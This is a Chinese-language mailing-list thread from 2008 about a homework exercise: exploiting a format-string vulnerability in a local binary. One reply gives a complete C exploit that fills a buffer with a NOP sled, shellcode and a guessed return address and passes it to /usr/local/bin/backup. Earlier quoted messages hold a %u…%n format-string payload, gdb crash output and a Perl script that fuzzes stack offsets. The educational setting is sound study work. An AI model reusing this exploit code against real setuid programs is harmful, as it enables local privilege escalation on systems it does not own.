如果是那样就应该是可以的... 刚刚又看了下, 你的那个字串为什么是%u?
我记得我以前是把那个buffer前面写地址后面一堆noop,然后是shellcode, 很久前写过一个的不知道用不用得了的, 照抄没用,
参考1下吧, 给你看看:
#include <stdio.h>
#include <stdlib.h>
#include "shellcode.h"
#define BUFFERSIZE 200
#define NOP '\x90'
#define TARGET "/usr/local/bin/backup"
#define OURTARGET "./backup"
unsigned long get_sp(void)
{
__asm__("movl %esp, %eax");
}
int main(int argc, char *argv[])
{
char *args[1];
char *env[1];
char buffer[BUFFERSIZE];
int off=0;
if (argc > 1) {
//for trying to mannually set the offset
off = atoi(argv[1]);
}
//for (off=0; off<1024; off+=4) {
int i;
long* ptr = (long *)buffer;
long ret = get_sp()+off; //ret address
printf("trying offset: %d | ret: %x\n",off,ret);
{ //generate buffer
for(i=0; i<BUFFERSIZE; i+=4)
*(ptr++) = ret;
for(i=0; i<BUFFERSIZE/2; i++)
buffer[i] = NOP;
char* cptr = buffer+BUFFERSIZE/2-strlen(shellcode)/2;
for(i=0; i<strlen(shellcode); i++)
*(cptr++) = shellcode[i];
buffer[BUFFERSIZE-1]=NULL;
}
char newbuff[BUFFERSIZE+5];
newbuff[0] = '%';newbuff[1] = '1';newbuff[2] = '1';newbuff[3] =
'3';newbuff[4] = 'd';
//newbuff[5] = '\xcc';newbuff[6] = '\xff';newbuff[7] =
'\xbf';newbuff[8] = '\xbf';
for (i=5; i<BUFFERSIZE+5; i++) {
newbuff[i] = buffer[i-5];
}
//args[0] = "\xcc\xff\xbf\xbf_%08x.%n";
args[0] = newbuff;
args[1] = NULL;
env[0] = NULL;
if (execve(TARGET, args, env) < 0)
fprintf(stderr, "execve failed.\n");
// }
return 0;
}
2008/10/2 qi chai <[EMAIL PROTECTED]>:
> hehe 谢谢 兄弟 你谦虚了!
> 实际上他这个环境是关了随机内存和stack禁止写入的~~~
> 应该是有办法exp的 要不这作业就没答案了 呵呵
>
> PS 我看你资料是在Canada是么?
>
> 2008/10/2 Haoyu Tang <[EMAIL PROTECTED]>
>>
>> FS的溢出我也是觉得比其他的较难利用, 我也没成功过几次... 主要是看当前操作系统的防御措施, 比如随机定位起始地址,
>> 比如拒绝写入stack, 所以FS现在不怎么好用, 不像以前了.
>>
>> 而且根据你的系统的报错信息, 似乎是操作系统已经做出了overflow的判断并且kill掉你的exploit了 -_-
>>
>> >>>Program received signal SIGSEGV<<<, Segmentation fault.
>>
>>
>> P.S 我可不是什么牛人, 以前不是现在不是以后也不是=.= 比起专业的安全界牛牛们我只是在软件工程界对系统安全有兴趣的初级初级~~
>> 学习是无止境的, 记得要共享 ;)
>>
>> 2008/10/2 qi chai <[EMAIL PROTECTED]>:
>> > 呵呵 谢谢你详细的分析 牛人!
>> > 我的判断也是在 fprintf(stderr, argv[1]); 有format string 溢出
>> > 仔细阅读的scut / team teso论文以及Google了一些资料后后,知道了原理 以及如何打印任意地址的内容
>> > 但对于exp仍然是无从下手 主要是觉得写入地址太过麻烦 而且医用%n就报段错误(vsprintf错误)
>> > 还望牛人在exp上指点一二!
>> >
>> > 错误如下:
>> > Starting program: /home/raullen/Desktop/T/primetarget
>> >
>> > "\x20\xf4\xff\xbf________%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u|%n|"
>> > Program received signal SIGSEGV, Segmentation fault.
>> > 0xb7ec764d in vfprintf () from /lib/tls/i686/cmov/libc.so.6
>> > (gdb) c
>> > Continuing.
>> >
>> > 以下附上我写的一个fuzz辅助定位stackpoping的小脚本:
>> > #use strict;
>> > #open (stdout, ">>1.txt");
>> > $count = 131;
>> > #$cmd = "/home/raullen/Desktop/T/primetarget "
>> > $pre = "\"AAAABBBB________";
>> > $suf = "|%08x|";
>> > while ($count < 132) {
>> > $line = "%u";
>> > $cmd = "/home/raullen/Desktop/T/primetarget ";
>> > #print "A"x$count; print "\n";
>> > $i = $count;
>> > REDO:
>> > if($i>0){
>> > $line = $line."%u";
>> > $i--;
>> > goto REDO;
>> > }
>> > #print $line;print "\n";
>> > print $count;
>> > $count++;
>> > $cmd = $cmd.$pre.$line.$suf." \" >>1.txt 2>&1";
>> > system($cmd);
>> > print $cmd;
>> > print "\n";
>> > }
>> >
>> > --
>> > The highest excellence is like that of water! www.raullen.net
>> >
>>
>>
>>
>> --
>> Atomic.Ping
>
>
>
> --
> The highest excellence is like that of water! www.raullen.net
>
--
Atomic.Ping
--~--~---------~--~----~------------~-------~--~----~
要向邮件组发送邮件,请发到 [email protected]
要退订此邮件,请发邮件至 [EMAIL PROTECTED]
-~----------~----~----~----~------~----~------~--~---
